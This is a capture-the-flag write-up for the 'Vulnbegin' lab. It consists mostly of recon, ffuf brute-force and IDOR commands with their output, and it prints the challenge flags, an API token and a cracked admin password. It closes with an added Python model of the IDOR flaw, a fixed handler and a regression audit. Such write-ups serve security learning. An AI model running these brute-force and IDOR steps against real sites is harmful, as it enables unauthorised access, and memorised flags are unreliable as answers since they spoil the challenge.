Vulnbegin
Subdomain Discovery
DNS Info
nslookup -type=any vulnbegin.co.uk 8.8.8.8
Server: 8.8.8.8
Address: 8.8.8.8#53
Non-authoritative answer:
Name: vulnbegin.co.uk
Address: 68.183.255.206
vulnbegin.co.uk nameserver = ns1.digitalocean.com.
vulnbegin.co.uk nameserver = ns2.digitalocean.com.
vulnbegin.co.uk nameserver = ns3.digitalocean.com.
vulnbegin.co.uk
origin = ns1.digitalocean.com
mail addr = hostmaster.vulnbegin.co.uk
serial = 1626211765
refresh = 10800
retry = 3600
expire = 604800
minimum = 1800
vulnbegin.co.uk text = "[^FLAG^BED649C4DB2DF265BD29419C13D82117^FLAG^]"
Authoritative answers can be found from
DNS Bruteforce
dnsrecon -d vulnbegin.co.uk -D ~/Dokumente/ctfchallenge/wordlists/subdomains.txt -t brt
[*] Performing host and subdomain brute force against vulnbegin.co.uk
[*] A server.vulnbegin.co.uk 68.183.255.206
[*] A www.vulnbegin.co.uk 68.183.255.206
[+] 2 Records Found
curl -H "Cookie: ctfchallenge=CENSORED" http://server.vulnbegin.co.uk
{"error":"User Not Authenticated","flag":"[^FLAG^E858ED9649E57BECE9ACD1A4C60D3446^FLAG^]"}%
SSL Certificate Records
Common Name | Matching Identities
v64hss83.vulnbegin.co.uk | v64hss83.vulnbegin.co.uk
vulnbegin.co.uk | *.vulnbegin.co.uk / vulnbegin.co.uk
Checking Domain v64hss83.vulnbegin.co.uk
curl -H "Cookie: ctfchallenge=CENSORED" http://v64hss83.vulnbegin.co.uk
[^FLAG^047524FE61AE6B5FD1D184994C7322FC^FLAG^]
Content Discovery
ffuf -w ~/Dokumente/ctfchallenge/wordlists/content.txt -t 1 -p 0.1 -H "Cookie: ctfchallenge=CENSORED" -u http://www.vulnbegin.co.uk/FUZZ -mc all -fc 404
=> Results <=
cpadmin
css
js
robots.txt
curl -H "Cookie: ctfchallenge=CENSORED" http://www.vulnbegin.co.uk/robots.txt
User-agent: *
Disallow: /secret_d1rect0y/%
curl -H "Cookie: ctfchallenge=CENSORED" http://www.vulnbegin.co.uk/secret_d1rect0y
[^FLAG^2B22E2CB70E218510802B0359488F6A2^FLAG^]%
Brute Force
Checking for Valid Users
./ffuf -w ~/Dokumente/ctfchallenge/wordlists/usernames.txt -X POST -d "username=FUZZ&password=x" -t 1 -p 0.1 -H "Cookie: ctfchallenge=CENSORED" -H "Content-Type: application/x-www-form-urlencoded" -u http://www.vulnbegin.co.uk/cpadmin/login -fr 'Username is invalid'
admin [Status: 200, Size: 1483, Words: 422, Lines: 37]
Bruteforcing Password
./ffuf -w ~/Dokumente/ctfchallenge/wordlists/passwords.txt -X POST -d "username=admin&password=FUZZ" -t 1 -p 0.1 -H "Cookie: ctfchallenge=CENSORED" -H "Content-Type: application/x-www-form-urlencoded" -u http://www.vulnbegin.co.uk/cpadmin/login -fr 'Password is invalid'
159753 [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 31ms]
Flag
Content Discovery #2
./ffuf -w ~/Dokumente/ctfchallenge/wordlists/content.txt -t 1 -p 0.1 -H "Cookie: ctfchallenge=CENSORED" -u http://www.vulnbegin.co.uk/cpadmin/FUZZ -mc all -fc 404
env [Status: 200, Size: 111, Words: 2, Lines: 1]
API Recon
Check the API
curl -H "X-Token: 492E64385D3779BC5F040E2B19D67742" -H "Cookie: ctfchallenge=CENSORED" http://server.vulnbegin.co.uk
{"messaged":"User Authenticated","flag":"[^FLAG^0BDC60CC5E283476E7107C814C18DCCF^FLAG^]"}%
Search for API Endpoints
./ffuf -w ~/Dokumente/ctfchallenge/wordlists/content.txt -t 1 -p 0.1 -H "X-Token: 492E64385D3779BC5F040E2B19D67742" -H "Cookie: ctfchallenge=CENSORED" -u http://server.vulnbegin.co.uk/FUZZ -mc all -fc 404
user [Status: 200, Size: 89, Words: 1, Lines: 1]
curl -H "X-Token: 492E64385D3779BC5F040E2B19D67742" -H "Cookie: ctfchallenge=CENSORED" http://server.vulnbegin.co.uk/user
{"id":27,"endpoint":"\/user\/27"}
curl -H "X-Token: 492E64385D3779BC5F040E2B19D67742" -H "Cookie: ctfchallenge=CENSORED" http://server.vulnbegin.co.uk/user/27
{"id":27,"username":"vulnbegin_website","endpoint":"\/user\/27\/info"}
curl -H "X-Token: 492E64385D3779BC5F040E2B19D67742" -H "Cookie: ctfchallenge=CENSORED" http://server.vulnbegin.co.uk/user/27/info
{"id":27,"username":"vulnbegin_website","description":"User for the main website","flag":"[^FLAG^7B3A24F3368E71842ED7053CF1E51BB0^FLAG^]"}%
Check for IDOR
seq 1 100 | ./ffuf -w - -t 1 -p 0.1 -H "X-Token: 492E64385D3779BC5F040E2B19D67742" -H "Cookie: ctfchallenge=CENSORED" -u http://server.vulnbegin.co.uk/user/FUZZ -mc all -fc 404
5 [Status: 403, Size: 48, Words: 9, Lines: 1, Duration: 32ms]
27 [Status: 200, Size: 70, Words: 1, Lines: 1, Duration: 31ms]
curl -H "X-Token: 492E64385D3779BC5F040E2B19D67742" -H "Cookie: ctfchallenge=CENSORED" http://server.vulnbegin.co.uk/user/5
["You do not have permission to view this user"]
curl -H "X-Token: 492E64385D3779BC5F040E2B19D67742" -H "Cookie: ctfchallenge=CENSORED" http://server.vulnbegin.co.uk/user/5/info
{"id":5,"username":"admin","description":"admin for the server","flag":"[^FLAG^3D82BE780F46EE86CE060D23E6E80639^FLAG^]"}
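The /user/5 request is refused while /user/5/info is served, which means the ownership check runs on the parent route but not on its child. The following is an added example, not code from the original write-up or from the target application: a constructed Python model of that behaviour next to the corrected handler, plus a regression check that flags any route serving another user's object. The handler names, the owns() check and the sample records are assumptions made for illustration.

```python
# Added example: constructed model of the API behaviour seen above, not the target's code.
USERS = {  # constructed sample records mirroring the responses on the page, flags omitted
    27: {"username": "vulnbegin_website", "description": "User for the main website"},
    5: {"username": "admin", "description": "admin for the server"},
}
DENIED = ["You do not have permission to view this user"]

def owns(caller_id, user_id):
    """Object-level authorization: a caller may read only their own record."""
    return caller_id == user_id

def user_summary(caller_id, user_id):
    # Parent route: checks ownership before returning anything.
    if not owns(caller_id, user_id):
        return 403, DENIED
    return 200, {"id": user_id, "username": USERS[user_id]["username"],
                 "endpoint": f"/user/{user_id}/info"}

def user_info_vulnerable(caller_id, user_id):
    # Flaw: the child route assumes the parent route already checked access.
    return 200, {"id": user_id, **USERS[user_id]}

def user_info_fixed(caller_id, user_id):
    # Fix: repeat the ownership check on every route that accepts an object id.
    if not owns(caller_id, user_id):
        return 403, DENIED
    return 200, {"id": user_id, **USERS[user_id]}

def audit(routes, caller_id):
    """Regression check: list (route, id) pairs that serve another user's object."""
    leaks = []
    for name, handler in routes.items():
        for user_id in USERS:
            status, _ = handler(caller_id, user_id)
            if user_id != caller_id and status == 200:
                leaks.append((name, user_id))
    return leaks

VULNERABLE = {"/user/{id}": user_summary, "/user/{id}/info": user_info_vulnerable}
FIXED = {"/user/{id}": user_summary, "/user/{id}/info": user_info_fixed}

if __name__ == "__main__":
    print("vulnerable:", audit(VULNERABLE, caller_id=27))
    print("fixed:", audit(FIXED, caller_id=27))
```

Running audit() over every route that takes an object id, as part of the API's test suite, catches a child route that was added without the check.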